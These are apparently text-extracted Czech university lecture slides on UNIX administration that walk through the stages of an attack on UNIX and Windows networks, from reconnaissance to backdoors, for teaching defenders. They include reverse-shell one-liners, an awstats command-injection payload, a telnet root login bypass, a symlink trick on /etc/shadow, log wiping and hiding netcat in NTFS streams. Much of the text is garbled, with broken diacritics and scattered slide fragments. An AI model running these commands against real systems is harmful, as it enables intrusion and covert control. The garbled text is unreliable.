Leo Galamboš. Administrace UNIXu

Administrace UNIXu Leo Galamboˇs


2010

Administrace UNIXu Leo Galamboˇs Administrativa ´ Utoky Anatomie

Lokalizace

Part I

´ ı Skenovan´ ˇ ren´ı der ˇ Proveˇ

Administrace a prostˇred´ı

´ ı Z´ıskan´ pˇr´ıstupu UNIX MS-Windows

Pos´ılen´ı pˇr´ıstupu UNIX MS-Windows

´ an´ ´ ı Vykrad UNIX MS-Windows

Zakryt´ı stop UNIX MS-Windows

´ Zadn´ı vratka ´ er ˇ Zav

´ sky Obsah pˇrednaˇ


Lokalizace ´ ı Skenovan´

´ UNIXu metodika spravy ´ ´ zakladn´ ı administratorsk e´ cˇ innosti ´ ı s´ıˇtovan´ prostˇred´ı menˇs´ı firemn´ı s´ıteˇ ´ ı techniky napaden´ı a ochrany konkretn´

ˇ ren´ı der ˇ Proveˇ ´ ı Z´ıskan´ pˇr´ıstupu UNIX MS-Windows





Administrace UNIXu

Internet

IPSec

Leo Galamboˇs Štít

Administrativa ´ Utoky Anatomie

Lokalizace

Road warrior

´ ı Skenovan´ ˇ ren´ı der ˇ Proveˇ ´ ı Z´ıskan´ pˇr´ıstupu Dohled

UNIX MS-Windows

Tisk

SMTP


Zálohování

´ an´ ´ ı Vykrad DNS

UNIX MS-Windows

AMD

NIS/YP


´ Zadn´ı vratka NFS

´ er ˇ Zav

´ cet a zkouˇsku Poˇzadavky na zapoˇ


´ cet Zapoˇ ´ ı poˇzadavky urˇcuje cviˇc´ıc´ı konkretn´ ´ sen´ı ke zkouˇsce nutný pro pˇrihlaˇ

Lokalizace ´ ı Skenovan´ ˇ ren´ı der ˇ Proveˇ ´ ı Z´ıskan´ pˇr´ıstupu UNIX MS-Windows

Pos´ılen´ı pˇr´ıstupu

Zkouˇska ´ nejvýsˇ e jeden pˇredterm´ın (v pˇr´ıpadeˇ zajmu) ´ eˇ 3 term´ıny v ˇradn ´ em ´ zkouˇskovem ´ prav

UNIX MS-Windows




Administrace UNIXu Leo Galamboˇs Administrativa

´ ı Varovan´

´ Utoky Anatomie

´ ska popisuje obecne´ postupy, kterým je nutne´ Tato pˇrednaˇ ´ – efektivn´ı obrana je vˇzdy zaloˇzena na znalosti formy branit utoku. ´ ´ nen´ı v zˇ adn ´ em ´ pˇr´ıpadeˇ navodem ´ Tento studijn´ı material k ´ ´ jakýmkoliv nezakonn´ ym aktivitam.



´ an´ ´ ı Vykrad

ˇ Doplnkov e´ zdroje: RFC2196

UNIX MS-Windows



Anatomie utoku ´


Zajištění prostoru jmen, IP adres, zájmových osob

Administrativa Lokalizace

´ Utoky

Veřejné vyhledávací služby, whois báze, DNS, AXFR,… Nářadí: dig, nslookup, dnsmap, whois, DNSpredict, fierce,...

Anatomie

Skenování

Zjištění (vstupních) cílů Skenery TCP/UDP služeb, detekce OS, verzí démonů, ... Nářadí: fping, nmap, amap, xprobe2, SinFP,...


Analýza a prověření cílů a uživatelských účtů Výpisy účtů, zdrojů, SNMP, identifikace aplikací,... Nářadí: null sessions, DumpSec, showmount, nmbscan, rpcinfo, nmap, snmpwalk, snmpcheck, netcat...

Vytěžení cílů

Získání přístupu

Zvýšení získaných oprávnění

ˇ ren´ı der ˇ Proveˇ

Prověření děr

Sniffing hesel, brute-force, penetrační programy,... Nářadí: dsniff, Cain&Abel, phoss, hydra, SIPcrack, Metasploit framework, airsnarf, kismet,...

UNIX MS-Windows


Posílení přístupu

Password cracking, exploits, script kiddies, ... Nářadí: john, rcrack, ophcrack, Cain, ntbf, LCP,...

UNIX

Vykrádání

Opětovné vytěžování nově získaných zdrojů Zneužívání důvěry, analýza dostupných dat (hesla, kódy),... Nářadí: rhosts, ssh/ssh-keygen, LSA secrets, C&A, /etc,...

Zakrytí průniku před administrátory a dozorem

´ ı Z´ıskan´ pˇr´ıstupu

MS-Windows


Zakrytí stop

Zakryt´ı stop

Vyčištění logů, zakrytí „nového“ software,... Nářadí: logclean-ng, wtmpclean, rootkity, file streaming,...

UNIX

Vytvoření vrátek a mostů pro opětovné získání nadvlády

Zadní vrátka

?

Nové účty, cron-job, startup infekce, monitoring, trojani… Nářadí: cron, rc, registry, keylog, VNC, psexec, ssh a login s patchi,...

MS-Windows


Tor


´ ı zakryt´ı vlastn´ı identity a stop pˇri vyˇsetˇrovan´ vrstvena´ architektura (”Onion network”) ´ aplikaˇcn´ı nezavislost via TCP/SOCKS torbutton: Add-on pro Firefox

´ Utoky Anatomie


# tor-resolve www.cvut.cz 147.32.3.39 # tcpdump -i eth0 -n port 53 tcpdump: verbose output suppressed, use -v or -vv for full protocol decode listening on eth0, link-type EN10MB (Ethernet), capture size 96 bytes ˆC 0 packets captured 0 packets received by filter 0 packets dropped by kernel





Administrace UNIXu

Nevýhoda Tor Menˇs´ı s´ıla a variabilita jak vlastn´ı botNET.

Leo Galamboˇs Administrativa ´ Utoky Anatomie

# proxychains nmap -sT -PN -n -sV -p 21,22,80 www.fd.cvut.cz ProxyChains-3.1 (http://proxychains.sf.net)

Lokalizace

Starting Nmap 5.21 ( http://nmap.org ) at CENSORED CEST |DNS-request| www.fd.cvut.cz |S-chain|-<>-127.0.0.1:9050-<><>-CENSORED:53-<><>-OK |DNS-response| www.fd.cvut.cz is 147.32.100.7 |S-chain|-<>-127.0.0.1:9050-<><>-147.32.100.7:80-<><>-OK |S-chain|-<>-127.0.0.1:9050-<><>-147.32.100.7:22-<><>-OK |S-chain|-<>-127.0.0.1:9050-<><>-147.32.100.7:21-<--timeout |S-chain|-<>-127.0.0.1:9050-<><>-147.32.100.7:22-<><>-OK |S-chain|-<>-127.0.0.1:9050-<><>-147.32.100.7:80-<><>-OK Nmap scan report for www.fd.cvut.cz (147.32.100.7) Host is up (0.97s latency). PORT STATE SERVICE VERSION 21/tcp closed ftp 22/tcp open ssh OpenSSH 4.3p2 Debian 9etch3 (protocol 2.0) 80/tcp open http Apache httpd Service Info: OS: Linux


Nmap done: 1 IP address (1 host up) scanned in 27.16 seconds

´ ı Skenovan´






ˇ zen´ı DNS Vyteˇ


http://(vpn,fw,owa,outlook).cvut.cz/ ˇ zen´ı DNS (AXFR) vyteˇ

´ Utoky Anatomie


$ > > >

nslookup server 147.32.266.8 set type=ANY ls -d ex.cvut.cz.

# proxychains dig +tcp @CENSORED fd.cvut.cz AXFR ProxyChains-3.1 (http://proxychains.sf.net) |S-chain|-<>-127.0.0.1:9050-<><>-CENSORED:53-<><>-OK ; <<>> DiG 9.4.3-P5 <<>> +tcp @CENSORED fd.cvut.cz AXFR ; (1 server found) ;; global options: printcmd : fd.cvut.cz. IN NS ns.cvut.cz. fd.cvut.cz. IN NS ns1.horska.fd.cvut.cz. fd.cvut.cz. IN NS dhcp.fd.cvut.cz. _samba._tcp.fd.cvut.cz. IN SRV 10 1 139 firewall.fd.cvut.cz. _samba._tcp.fd.cvut.cz. IN SRV 10 1 445 firewall.fd.cvut.cz. _vlmcs._tcp.fd.cvut.cz. IN SRV 0 0 1688 kms.vc.cvut.cz. :






ˇ udaj Sber ´ u˚


webove´ prezentace, dceˇrinne´ spoleˇcnosti ˇ ´ ı s´ıte, ˇ usenet) udaje o zamestnanc´ ıch (socialn´ ´ ´ ıc´ı systemy ´ IT: osoby chran´ MRK, SLS: social-hacking MNGMNT: nerozum´ı IT, maj´ı ale moc


´ outsourcing www (poznamky v HTML) struktura AS v okol´ı – utok na s´ıteˇ bezpeˇcnostn´ıch ´ sloˇzek ˇ Google map umoˇznuje orientaci na m´ısteˇ cˇ inu ochrana(?): RFC 2196





ˇ (historických) udaj Sber ´ u˚


´ ˇ Webove´ stranky – zamestnanci, SW, IS/IT http://www.archive.org/ Usenet/NNTP

´ Webove´ stranky – Google Google hacking database1 Athena2 , SiteDigger3 , Nikto/Wikto4




Zakryt´ı stop 1

http://johny.ihackstuff.com/ghdb.php http: //www.snakeoillabs.com/downloads/Athena2.0.msi 3 http://www.foundstone.com/ 4 http://www.sensepost.com/research/wikto

UNIX MS-Windows

2


´ veˇrejných baz´ ´ ı (whois, dns registry) Problem


Lokalizace

obsahuj´ı citlive´ udaje ´ ´ naivn´ı sprava domain hijacking ˇ ana ´ 5 na autonete.net AOL pˇresmerov

´ maj´ı webova´ rozhran´ı - arch´ıvy WWW stranek ´ rˇeˇsen´ı: ”anonymn´ı” info@, POBox, atp. (nedokonale)

´ ı Skenovan´ ˇ ren´ı der ˇ Proveˇ ´ ı Z´ıskan´ pˇr´ıstupu UNIX MS-Windows




´ Zadn´ı vratka ´ er ˇ Zav 5

´ autorizovano dle FROM poloˇzky z e-mailu

Anatomie utoku ´




´ Utoky


Anatomie

Skenování




Vytěžení cílů




Prověření děr


UNIX MS-Windows




UNIX

Vykrádání




MS-Windows


Zakrytí stop

Zakryt´ı stop


UNIX


Zadní vrátka

?


MS-Windows


´ ı portu˚ a OS Skenovan´


ˇ ı TCP/UDP portu˚ v LISTENING stavu zjiˇsten´ ´ ı IP stacku) side-effect: verze OS (dle chovan´ pasivn´ı detekce OS: siphon nmap mnoho typu˚ skenu˚ TCP full/SYN/FIN/Xmas/Null, ´ stealth mod strobe a tcp scan (SAINT) pouze tcp udp scan (SATAN, SAINT) je spolehlivý, ale i dobˇre zachytitelný v IDS




MS-Windows: Netcat, SuperScan, WUPS, ScanLine


Ochrana Detekce pomoc´ı snorta . Dokonala´ ochrana neexistuje.


´ Zadn´ı vratka a

http://www.snort.org/

´ er ˇ Zav

ICMP


výborný protokol pro analytiku s´ıteˇ ´ v plne´ sˇ ´ıˇri velmi nebezpeˇcný, pokud je pouˇz´ıvan ˇ ´ ı via ICMP ECHO loki2 umoˇznuje tunelovan´



Routery, CISCO ´ ICMP 13 (timestamp) muˇ tj. ˚ ze prozradit cˇ asovou zonu, ˇ ı. ICMP 17 (address mask) muˇ um´ısten´ ˚ ze prozradit ´ k efektivn´ımu DoS. broadcast a vest

UNIX MS-Windows




DNS

Administrace UNIXu Leo Galamboˇs Administrativa ´ Utoky

ˇ ı verze, patch urovn ˇ a nekdy ˇ Zjiˇsten´ e, i typu a verze O/S ´

Anatomie

Lokalizace # dig @147.32.103.3 version.bind CH TXT ´ ı Skenovan´ ; <<>> DiG 9.4.3-P5 <<>> @147.32.103.3 version.bind CH TXT ; (1 server found) ;; global options: printcmd ;; Got answer: ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 62844 ;; flags: qr aa rd; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 0 ;; WARNING: recursion requested but not available ;; QUESTION SECTION: ;version.bind. CH TXT ;; ANSWER SECTION: version.bind. 0 CH TXT "9.3.6-P1-RedHat-9.3.6-4.P1.el5_4.2"



´ an´ ´ ı Vykrad UNIX

;; AUTHORITY SECTION: version.bind. 0 CH NS version.bind.

MS-Windows



cheops-ng.sf.net







Anatomie utoku ´




´ Utoky


Anatomie

Skenování




Vytěžení cílů




Prověření děr


UNIX MS-Windows




UNIX

Vykrádání




MS-Windows


Zakrytí stop

Zakryt´ı stop


UNIX


Zadní vrátka

?


MS-Windows


Bannery


# telnet www.fd.cvut.cz 80 Trying 147.32.100.7... Connected to www.fd.cvut.cz. Escape character is ’ˆ]’. HEAD / HTTP/1.0 HTTP/1.1 200 OK Date: CENSORED Server: Apache Connection: close Content-Type: text/html # telnet fdlin.fd.cvut.cz. smtp Trying 147.32.100.10... Connected to fdlin.fd.cvut.cz.. Escape character is ’ˆ]’.




220 fdlin.fd.cvut.cz ESMTP Postfix

MS-Windows



´ ı poloˇzek Listovan´


MS RPC – epdump (Reskit), rpcdump6

´ Utoky

MS NMB – nmbscan

Lokalizace

MS zdroje – DumpSec7

´ ı Skenovan´

ˇ ruje, zda je DNS cache snooping: utoˇ ´ cn´ık proveˇ ´ zaznam v keˇsi DNS AXFR (viz dˇr´ıve)

Anatomie



MS SMB null-session net use \\147.32.300.8\IPC$ "" /u:"" nebo vˇse v jednom skrze NBTEnuma a

UNIX MS-Windows


Zakryt´ı stop

http://ntsleuth.0catch.com/

UNIX MS-Windows

´ Zadn´ı vratka 6

http://oss.coresecurity.com/impacket/rpcdump.py 7 http://www.somarsoft.com/

´ er ˇ Zav

Anatomie utoku ´




´ Utoky


Anatomie

Skenování




Vytěžení cílů




Prověření děr


UNIX MS-Windows




UNIX

Vykrádání




MS-Windows


Zakrytí stop

Zakryt´ı stop


UNIX


Zadní vrátka

?


MS-Windows


´ Utoky na UNIX



brute-force: THC-Hydra8


buffer-overflow: stack/heap execution


nekontrolovaný vstup: telnet -l "-froot" 147.32.300.69

UNIX MS-Windows





http://freeworld.thc.org/thc-hydra/ 9 Solaris 10 in.telnetd, podobneˇ AIX a rlogin

´ er ˇ Zav

Reverse telnet


´ ı telnet spoje k Pˇres vadnou webovou aplikaci vyvolan´ utoˇ ´ cn´ıkovi ˇ sinou pust´ı do portu˚ 80, 8080 atp. firewall ji vetˇ utoˇ ´ cn´ık pouˇzije nc (netcat) v listening reˇzimu



telnet ip 80 | bash | telnet ip 8080


../awstats.pl?configdir=|echo%20;echo%20;telnet%20ip%2080..


´ z nc -e bash ip 80 jednoduˇseji teˇ

UNIX MS-Windows


8080

UNIX MS-Windows


bash

UNIX MS-Windows

Zakryt´ı stop UNIX

80

MS-Windows


BIND/DNS


DNS cache poisoning ´ podvrˇzen´ı zaznam u˚ v DNS keˇsi

Lokalizace ´ ı Skenovan´ ˇ ren´ı der ˇ Proveˇ

´ ı verze (skenovan´ ´ ı version.bind) citlive´ jen pro konkretn´ ´ ı sekvence dotazu˚ – CNAME, delegovan´ ´ ı–a vyvolan´ odhalen´ı sekvence portu˚ a DNS ID




DNS TSIG overflow (starˇs´ı verze BIND)

MS-Windows



SSH


ˇ ´ zných der ˇ v OpenSSH Existovalo nekolik vaˇ napˇr´ıklad int overflow v challenge-response auth proceduˇre ´ root-a utoˇ ´ cn´ık z´ıska´ prava

´ Utoky Anatomie


Monitor



Kryptomateriál


Útočník

Otrok 1

Otrok 2

Systém


´ ´ Utok na promisc mod


ˇ z´ı typicky pod root-em monitoring, IDS beˇ ´ ze prostˇrelit system ´ vhodneˇ podvrˇzený packet dokaˇ ˇ sne´ utoky usp na tcpdump i snort ´ eˇ ´ ˇ infikovaný doplat´ı na svoji ”zvedavost” utoˇ ´ cn´ık c´ıl nijak nekontaktuje!




Viz. Hispahack Research Team http://hispahack.ccc.de/

MS-Windows



´ Utoky na MS-Windows


Lokalizace

autentizaˇcn´ı spoofing: brute-force, MTM, slovn´ık ´ y utok: vzdalen´ Metasploit10 ´ utok na aplikace: Office, IE11 ´ utok na ovladaˇce: Netgear 802.11 Beacon remote code ´ execution12





10

testy zranitelnost´ı http://framework.metasploit.com/ 11 Napˇr´ıklad buffer-overflow LoadAniIcon/user32.dll 12 Cache, Moore, skape http://www.uninformed.org/?v=all&a=29&t=sumry


Autentizaˇcn´ı spoofing


Lokalizace

software: enum, Brutus, Medusa, Venom, ad. ´ e´ politice nebýva´ usp ˇ sný pˇri spravn ´ eˇ

´ ı Skenovan´ ˇ ren´ı der ˇ Proveˇ ´ ı Z´ıskan´ pˇr´ıstupu UNIX

Ochrana ´ ı Dobra´ bezpeˇcnostn´ı pravidla, napˇr. silna´ hesla, zamykan´ hesla, kontrola Event logu,. . .

MS-Windows





Odposlech hesla


Lokalizace

´ Utok na LanManager, NTLM a Kerberos ´ ´ LN se lame nejlepe: Cain, LCP13 , l0pthcrack ´ ˇ brute-force, slovn´ık NTLM se lame sˇ patne: K5 lze zlomit slovn´ıkovým utokem na prvn´ı packet ´ zaˇsifrovaný kl´ıcˇ em odvozeným z hesla ´ Cain lame vˇse, nav´ıc um´ı ARP spoof






http://www.lcpsoft.com/

MTM: sp´ıc´ı muˇz uprostˇred



smbrelay a smbproxy14


Cain


Ochrana ´ ı komunikace. Firewall s IPsec? Autentizace a sˇ ifrovan´





crackuj´ı heˇse hesel

Anatomie utoku ´




´ Utoky


Anatomie

Skenování




Vytěžení cílů




Prověření děr


UNIX MS-Windows




UNIX

Vykrádání




MS-Windows


Zakrytí stop

Zakryt´ı stop


UNIX


Zadní vrátka

?


MS-Windows


Symlink hack


´ symlink vedeme na systemov´ y soubor ´ ˇ prava ´ vadnou utilitu nechame zmenit


Solaris-like pˇr´ıklad $ ln -s /etc/shadow /var/dt/appconfig/appmanager/generic-display-0 $ /usr/dt/bin/dtappgather MakeDirectory: /var/dt/appconfig/appmanager/generic-display-0: File exists $ ls -l /etc/shadow -r-xr-xr-x 1 ivan staff ....





UNIX


Core file ´ ı coredump v serverove´ aplikaci vyvolan´ ´ shadow baze ´ výsledný dump muˇ ˚ ze obsahovat cˇ asti ˇ sne´ na FTPD (pˇri PASV pˇred nalogovan´ ´ ım) usp ´ eˇ

´ Utoky Anatomie


Race conditions na wu-ftpd

Pos´ılen´ı pˇr´ıstupu UNIX

ABOR zpusoboval SIGURG ˚ zavˇren´ı portu data-spoje vyvolalo SIGPIPE

MS-Windows


SIGPIPE: dologout()-uid0-writeLogs-closeLogs-exit ´ a´ root-a po FTP ABOR po pˇrechodu na uid0 dav



UNIX


Sd´ılene´ knihovny modifikace LD PRELOAD ˇ in.telnetd umoˇznoval aktivaci s modifikovaným LD PRELOAD a aktivace /bin/login pak muˇ ˚ ze linkovat povrˇzenou autentizaˇcn´ı rutinu

´ Utoky Anatomie


Vady kernelu - cˇ istý exploit z ringu 0 ´ eskalace z “libovolneho” uˇzivatele na root-a ˇ SELinux a spol. pomuˇ ˚ ze jen nekdy napˇr´ıklad vada ovladaˇcu˚ LKM: enyelkm, SucKIT, MoodNT





Microsoft Windows



ˇ sina slabin se pravidelneˇ opravuje vetˇ getadmin utoky skrze DLL injection15 ´






Vyˇzaduje interaktivn´ı sezen´ı

Anatomie utoku ´




´ Utoky


Anatomie

Skenování




Vytěžení cílů




Prověření děr


UNIX MS-Windows




UNIX

Vykrádání




MS-Windows


Zakrytí stop

Zakryt´ı stop


UNIX


Zadní vrátka

?


MS-Windows


UNIX


John the Ripper ˇ s´ı utilita na lam ´ an´ ´ ı hesel nejobl´ıbenejˇ


Lokalizace

inteligentn´ı tvorba hintu˚

´ ı Skenovan´

Modular Crypt Format (MCF) 1MD5/2BLF:Salt:Hash


root:$1$nLP5O79D$fghsiorn6wedie777:14201... halt:*:9797:0::::: operator:*:9797:0:::::




S´ıˇtova´ komunikace HTTP Suru attack

MS-Windows

proxy16

DP na MFF



16

http://www.sensepost.com/labs/tools/pentest/suru

´ ı hesel/heˇsu˚ MS-Windows z´ıskan´


´ pˇr´ıstupu (VM) – WinPE a BartPE17 pˇri fyzickem pwdump utility18 skrze priv. mode DLL injection ´ Administratora ´ lsass.exe – vyˇzaduje prava

´ Utoky Anatomie

Lokalizace ´ ı Skenovan´ ˇ ren´ı der ˇ Proveˇ ´ ı Z´ıskan´ pˇr´ıstupu UNIX

Keˇs Local Security Authority (LSA)19 ´ eˇ hesla pro pˇr´ıstup stroje k domen 10 posledn´ıch heˇsu˚ nalogovaných uˇzivatelu˚ hesla sluˇzeb, ftp/www hesla, RAS uˇ ´ cty

MS-Windows




17

http://www.nu2.nu/pebuilder/ http://www.foofus.net/ 19 HKLM\SECURITY\Policy\Secrets 18


MS-Windows cracking


Lokalizace

ˇ Windows nemaj´ı salt a to usnadnuje utoky ´ 37 ´ a´ pouhých 2 heˇs´ı (znaky jsou uppercase)20 LM dav SW: John21 , ntbf22 , Cain23 , LCP24 , ad.




Zakryt´ı stop 20

P. Oechslin (2003): prolomeno za 14 sekund. http://www.openwall.com/john/ 22 http://www.toolcrypt.org/ 23 http://www.oxid.it/ 24 http://www.lcpsoft.com/

UNIX MS-Windows

21


Anatomie utoku ´




´ Utoky


Anatomie

Skenování




Vytěžení cílů




Prověření děr


UNIX MS-Windows




UNIX

Vykrádání




MS-Windows


Zakrytí stop

Zakryt´ı stop


UNIX


Zadní vrátka

?


MS-Windows


UNIX

Administrace UNIXu Leo Galamboˇs Administrativa ´ Utoky

Instalace

rootkitu25

Anatomie

Lokalizace

trojan: zmodifikovaný program login, ps,. . .

´ ı Skenovan´

back-door inetd nebo webapp


sniffery: dsniff, wireshark,. . . cˇ istiˇc logu: logclean-ng




Rathole a.k.a. rat – hole

UNIX MS-Windows



http: //packetstormsecurity.org/UNIX/penetration/rootkits/

´ er ˇ Zav

MS-Windows


vypnut´ı auditu auditpol /disable (Resource Kit) ˇ ı Event logu elsave26 vyˇciˇsten´ zakryt´ı souboru˚ hidden pˇr´ıznak alternate data streams (NTFS) odhal´ı sfind27

> cp nc.exe enemyterritory.exe:nc.exe > start process.exe:nc.exe






http://www.ibt.ku.dk/jesper/Windowstools 27 http://www.foundstone.com/

´ er ˇ Zav

Anatomie utoku ´




´ Utoky


Anatomie

Skenování




Vytěžení cílů




Prověření děr


UNIX MS-Windows




UNIX

Vykrádání




MS-Windows


Zakrytí stop

Zakryt´ı stop


UNIX


Zadní vrátka

?


MS-Windows


MS-Windows


Lokalizace

netcat posloucha´ na portu a po pˇripojen´ı spust´ı proces, napˇr. cmd.exe psexec vyuˇz´ıva´ pˇr´ımo SMB Back-door payloads nab´ız´ı i Metasploit WinVNC fpipe pro redirekci TCP spoju˚






´ Pouˇcen´ı administratovo


IP adresa utoˇ ´ cn´ıka je cˇ asto faleˇsna´ ´ ı vkladejte ´ do veˇrejných baz´ jen nutne´ udaje ´

´ Utoky

provozujte jen protokoly, kterým rozum´ıte (ICMP tunel) neposkytujte zbyteˇcneˇ cˇ ´ısla verz´ı software

´ ı Skenovan´

pravidelneˇ aktualizujte (BIND, exploity)

Anatomie

Lokalizace


instalujte jen nezbytný software (telnet, nc?) ´ rovneˇ ˇ z vyˇzaduje dohled IDS nen´ı vˇselek,


vyˇzadujte kvalitn´ı hesla separujte servery a klienty (napˇr. via DMZ) servery bez shell pˇr´ıstupu (exploit ring-0, LKM) ´ e´ nastaven´ı FW – omezte i odchoz´ı tok spravn





ˇ ˇ rit? Cemu lze skuteˇcneˇ v IS/IT veˇ ´ — Niˇcemu, nemate-li kvalitn´ı bezpeˇcnostn´ı politiku



´ Lze se ochranit? ˇ ım a pedantským pˇr´ıstupem — Ano, s velkým sˇ test´



Co kdyˇz meˇ dostanou? ´ obrovskou pˇr´ıleˇzitost pochopit jak k tomu doˇslo — Mate




Leo Galamboš. Administrace UNIXu

Recommend Documents